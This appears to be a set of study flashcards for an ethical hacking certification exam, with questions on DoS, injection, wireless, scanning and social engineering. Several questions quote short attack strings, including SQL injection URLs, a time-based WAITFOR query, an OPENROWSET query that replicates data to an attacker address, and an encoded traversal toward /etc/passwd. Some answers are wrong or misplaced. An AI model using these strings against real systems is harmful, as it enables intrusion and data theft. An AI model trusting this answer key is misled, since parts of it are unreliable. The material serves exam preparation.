Exam
What is the common lower threshold for a Pulse Wave attack?
300Gbps
A tester is attempting a CSPP attack. Which of the following is she most likely to use in conjunction with the attack?
;
What is the integrity check mechanism for WPA2?
CBC-MAC
In nmap, the http-methods script can be used to test for potentially risky HTTP options supported by a target. Which of the following methods would be considered risky per the script?
CONNECT
What kind of Injection Attack relies on new line characters (\r OR \n) for tricking a target server?
CRLF Injection
Which of the following techniques is considered human-based social engineering?
Diversion theft
An attacker successfully configured and set up a rogue wireless AP inside his target. As individuals connected to various areas, he performed a MITM attack and injected a malicious applet in some of the HTTP connections. This rerouted user requests for certain pages to pages controlled by the attacker. Which of the following tools was most likely used by the attacker to inject the HTML code?
Ettercap
What aspect of a Fragmentation Attack causes a target system to crash?
Exhaustion of resources
What kind of testing to detect SQL injection deals with direct parameter testing in a URL or similar, and is a black-box methodology?
Function Testing
HTML forms include several methods for transferring data back and forth. Inside a form, which of the following encodes the input into the Uniform Resource Identifier (URI)?
GET
Which of the following prevention methods prevents source address spoofing, and protects against flooding attacks originating from valid prefixes?
Ingress filtering
What kind of packets initiate a Smurf Attack?
ICMP echo
In nmap/Zenmap, what does the -sO flag indicate?
IP protocol scan
What kind of command injection, often used for defacement, is defined as adding input to a web script that is then used in the output HTML without being checked for code or scripting?
HTML Embedding
In one of the following social engineering techniques, an attacker assumes the role of a knowledgeable professional so that the organization's employees ask them for information. The attacker then manipulates questions to draw out the required information. Which is this technique?
Reverse social engineering
Which of the tools listed here is a passive discovery tool?
Kismet
Which of the following is not a common language for execution of XSS attacks?
Ruby
Which of the following is NOT an HTTP Header-based Injection technique? S-MIME X Forwarded-For Referer User-Agent
S-MIME
What kind of statement is traditionally the target injection point for SQLi, specifically in a WHERE section of this kind of clause?
SELECT
What kind of attack enables injection of client-side scripts to manipulate web pages viewed by other users?
Replay Attack
During which phase of a security/penetration test would a non-disclosure agreement (NDA) be executed?
Pre-Attack
Regarding SSIDs, which of the following are true statements? (Choose all that apply.)
SSIDs are part of every packet header from the AP. SSIDs can be up to 32 characters in length.
Which of the following statements is true about Secure Sockets Layer (SSL)?
SSL operates above the transport layer
Which of the following is not representative of a Volumetric DoS Attack?
SYN Flood
Which of the following does not use ICMP in the attack? (Choose two.)
SYN flood Peer to peer
Which of the following is a meta-search engine?
Startpage
In one of the following types of identity theft, the perpetrator obtains information from different victims to create a new identity by stealing a social security number and uses it with a combination of fake names, date of birth, address, and other details required for creating a new identity. Which is this type of identity theft?
Synthetic identity theft
What is the purpose of the Recon-Dog utility?
System information harvesting via API calls
In which of the following attack types does an attacker exploit vulnerabilities that evolve from the unsafe use of functions in an application in public web servers to send crafted requests to internal or backend servers?
Server-side request forgery
Which of the following attacks an already-authenticated connection?
Session hijacking
Which of the following prevention methods prevents DoS by intercepting and validating TCP connection requests?
TCP intercept
Which of the following attack types occurs at the OSI Layer 4 (Transport)?
TCP session hijack
While researching specific security issues, you decide to implement an anonymizer. Which of the following would not be a suitable tool?
Tails
Which of the following attack types occurs at the OSI Layer 5 (Session)?
Telnet-based DoS
Which of the following is used by SOAP services to format information?
XML
What kind of attack enables injection of client-side scripts to manipulate web pages viewed by other users?
XSS Attack
An attacker is looking at a target website and is viewing an account via URL http://www.anybiz.com/store.php?id=2. He next enters the following URL: http://www.anybiz.com/store.php?id=2 and 1=1. The web page loads normally. He then enters the following URL: http://www.anybiz.com/store.php?id=2 and 1=2. A generic page noting "An error has occurred" appears. Which of the following is a correct statement concerning these actions?
The site is vulnerable to blind SQL injection.
Which of the following is an evasion technique that involves replacing characters with their ASCII codes in hexadecimal form and prefixing each code point with the percent sign (%)?
URL encoding
What kind of information is unlikely to be gleaned from a geographical search engine (Google Earth, Wikimapia)?
Underground tunnels
Where is the primary flaw, which allows SQLi to occur, located?
Web application
Semicolon
What kind of character is used to terminate a SQL statement?
What kind of character is used to represent the end of a line in a Mac system?
\r
You are configuring rules for your Snort installation and want to have an alert message of "Attempted FTP" on any FTP packet coming from an outside address intended for one of your internal hosts. Which of the following rules are correct for this situation?
alert tcp $EXTERNAL_NET any -> $HOME_NET 21 (msg:"Attempted FTP")
In what situation would you employ a proxy server? (Choose the best answer.)
You want to filter Internet traffic for internal systems.
Given below are the steps involved in automated patch management: a=Test, b=Assess, c=Detect, d=Acquire, e=Maintain, f=Deploy. What is the correct sequence of steps involved in automatic patch management?
c → b → d → a → f → e
Which of the following firewalls is specifically implemented at OSI Layer 5 (Session)?
should be circut
In which of the following security risks does an API accidentally expose internal variables or objects because of improper binding and filtering based on a whitelist, allowing attackers with unauthorized access to modify object properties?
Mass assignment
Which of the following phishing techniques focuses on flooding spam across a network?
Spimming
You are examining log files and come across this URL: http://www.example.com/script.ext?template%2e%2e%2e%2e%2e%2f%2e%2f%65%74%63%2f%70%61%73%73%77%64. Which of the following best describes this potential attack?
An attacker appears to be using Unicode.
What is the purpose of the BillCipher utility?
Collecting information about a website or address
What kind of attack allows attackers to exploit vulnerable scripts on a server to use remote files rather than a trusted local file?
File Injection
Which of the following prevention methods controls the speed of outbound or inbound traffic of a network controller and can reduce the high-volume traffic caused by DDoS?
Rate limiting
How would you filter FTP control traffic on IP Address 10.0.0.10 in Wireshark?
ip.addr==10.0.0.10 && tcp.port=21
FTP
21
An attacker is viewing a blog entry showing a news story and asking for comments. In the comment field, the attacker enters the following: Nice post and a fun read... What is the attacker attempting to perform?
A cross-site scripting attack
Which of the following is NOT a component of Web Application Hacking Methodology?
Attack Network Infrastructure
Which of the following best describes a teardrop attack?
Attacker sends several overlapping, extremely large IP fragments.
Which of the following encoding schemes represents any binary data using only printable ASCII characters and is used for encoding email attachments for safe transmission over SMTP?
Base64 encoding
In which of the following types of hijacking can an attacker inject malicious data or commands into intercepted communications in a TCP session, even if the victim disables source routing?
Blind hijacking
What kind of SQL injection deals with conjoining a known valid statement with a target parameter to test the success of an injection?
Boolean Exploitation SQLi
The source code of software used by your client seems to have a large number of gets() alongside sparsely used fgets(). What kind of attack is this software potentially susceptible to?
Buffer overflow
An attacker tricks a user into visiting a malicious website via a phishing e-mail. The user clicks the email link and visits the malicious website while maintaining an active, authenticated session with his bank. The attacker, through the malicious website, then instructs the user's web browser to send requests to the bank website. Which of the following best describes this attack?
CSRF
Your company needs to implement a firewall. This device must be able to discard TCP segments based on parameters such as IP address, port, and protocol used. What kind of firewall would work here?
Circuit level firewall
Which feature of IPSec provides the ability to prevent a message from being read unless the appropriate decryption is used?
Confidentiality
Which of the following techniques is also called a one-click attack or session riding and is used by an attacker to exploit a victim's active session with a trusted site to perform malicious activities?
Cross-site request forgery attack
What kind of vulnerability allows the CRIME session hijack to work?
Data compression in SSL/TLS protocol
What kind of web-based timing attack is carried out by measuring the approximate time taken by a server to process a POST request?
Direct Timing
Which of the following is NOT an objective of scanning
Discover services supported by infrastructure devices
What causes an IPID number to be incremented?
Each packet sent by the host machine
Which of the following prevention methods scans the headers of IP packets leaving a network and ensures that unauthorized or malicious traffic never leaves the internal network?
Egress filtering
The following injection query is inputted to extract a database's name: http://www.certifiedhacker.com/page.aspx?id=1 or 1=convert(int, (DB_NAME))—. The following text is returned: Syntax error converting the nvarchar value '[DB_NAME]' to a column of data type int. What kind of injection has been performed?
Error based injection
What is the purpose of the FOCA utility?
Extracting metadata from document scans
Which of the following is not representative of an Application Layer DoS Attack?
HTTP PUT
While on vacation, Joe receives a phone call from his identity alert service notifying him that two of his accounts have been accessed in the past hour. Earlier in the day, he did connect a laptop to a wireless hotspot at McDonald's and accessed the two accounts in question. Which of the following is the most likely attack used against Joe?
Honeyspot access point
What kind of information is this following query attempting to extract: http://www.certifiedhacker.com/page.aspx?id=1; IF (ASCII(lower(substring((USER), 3,1)))=97) WAITFOR DELAY '00:00:10'—
If the first character in the username contains the letter "a"
Which of the following is a recommendation to protect against session hijacking? (Choose two.)
Implement IPSec throughout the environment. Use unpredictable sequence numbers.
Name the service, based on these attributes: Hierarchical, client-server based, allows directory searches via filters, organizes info by its attributes, often injected into via use of stacked parentheses
LDAP
SMTP Enumeration relies on three built-in commands. Which of the following options is NOT one of those three?
LIST
Which of the following attacks runs malicious code inside a browser and causes an infection that persists even after closing or browsing away from the malicious web page that spread the infection?
MarioNet attack
Which of the following is not an enumeration target for a MySQL database?
Mysql.schema
Which of the following tools is designed for automatic scanning of IPV4/V6 addresses, hostnames, domain names, and URLs?
NetScanTools Pro
Which of the following is not considered a strong tool for port scanning? Netcraft NetScanTools Pro Sandcat Browser Nmap
Netcraft
In nmap/Zenmap, what does the -sn flag indicate?
No Port Scan
What SQL function can be used to link a target database to an attacker's database for replication over port 80? EX: '; insert into _____??_____ ('SQLoledb', 'uid=sa; pwd=pass; Network=MAIN; Address=myIP,80;', 'select * from mydatabase..hacked_sysdatabases') select * sys.sysdatabases
OPENROWSET
Which protocol would work best to encrypt a VPN connection at OSI Layer 2 (Data Link)?
PPTP
Which of these attacks is considered a Presentation Layer (L7) vulnerability?
Parameter tampering
Which of the following phishing techniques is also referred to as "phishing without a lure"?
Pharming
Which of the following DoS attacks inflicts permanent damage on hardware, often causing a "bricked" system?
Phlashing
Which of the following is not representative of a Protocol DoS Attack?
Slowloris Attack
theHarvester is an automated tool that can collect public emails for what purpose?
Social engineering
What kind of testing involves applications like Parasoft Jtest, RIPS, CAST AIP, and Klocwork?
Source Code Review
An attacker performs a whois search against a target organization and discovers the technical point of contact (POC) and site ownership e-mail addresses. He then crafts an email to the owner from the technical POC, with instructions to click a link to see web statistics for the site. Instead, the link goes to a fake site where credentials are stolen. Which attack has taken place?
Spear phishing
An attack can be considered an equation: Attacks = Motive + Method + __________?
Vulnerability
Which of the following is the best choice in searching for and locating rogue access points?
WIPS
Which of the following use a 48-bit initialization vector? (Choose all that apply.)
WPA2 WPA
Which of the following statements is not true regarding WebGoat?
WebGoat can be installed on Windows systems only.
Which of the following tools is a good fit for identifying user input entry points in a page's HTML like User-Agent, Referer, Accept, Accept-Language, and Host-headers?
WebScarab
20. List the correct order of these session hijacking process components A: Command Injection, B: Monitor, C: Predict Session ID, D: Session Desynch, E: Sniff
a. E-B-D-C-A
